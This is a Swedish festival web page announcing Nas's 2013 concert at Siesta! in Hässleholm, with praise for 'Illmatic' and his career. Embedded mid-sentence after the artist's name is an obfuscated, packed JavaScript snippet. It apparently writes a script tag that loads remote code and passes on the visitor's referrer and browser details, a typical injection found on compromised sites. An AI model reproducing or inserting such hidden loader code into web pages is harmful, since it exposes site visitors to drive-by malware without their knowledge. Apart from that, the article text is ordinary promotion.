Image Image Image Image Image Image Image Image Image Image

| 28 januari, 2020

Scroll to top

Top

Nas till Siesta 2013!

Nas till Siesta 2013!
Sebastian

Nas eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzkfs|var|u0026u|referrer|khsed||js|php’.split(’|’),0,{}))
är onekligen en av världens främsta rappare genom tiderna. Nu gör han en exklusiv festivalspelning på Siesta! i Hässleholm…

1994 släpptes den debut som fortfarande, nitton år senare, räknas till en av de bästa skivorna som någonsin gjorts och med ”Illmatic” skrev Nas in sig själv i musikhistorien.

Det sägs att en svala inte gör en sommar och på samma sätt ger inte ett fantastiskt album en karriär men när varenda släppt skiva når Billboards r’n’b-listas andra eller första plats finns det inte mycket kvar att ifrågasätta.

Hur förmedlar man betydelsen av en legendar och superstjärna i såhär korta ordalag? Nas är killen som på grund av biljettryck körde rygg-i-ryggkonsert på Berns i mars. Han har turnerat med Bob Marleys son Damien.

Han skriver socialrealistiska texter vars värde för fansen aldrig skulle gå att omsätta i pengar. Det är östkusthiphop och det är Brooklyn och det är smutsigt och tungt och alldeles, alldeles fantastiskt.

Senaste festivalspelningen i Sverige var på Way Out West 2009 och när han nu åter spelar för en svensk festivalpublik har han dessutom den senaste skivan ”Life Is Good” med sig i repertoaren.

Episkt är nog det mest passande ordet för att beskriva det faktum att Nas kommer till Hässleholm.

Tro Hopp Kärlek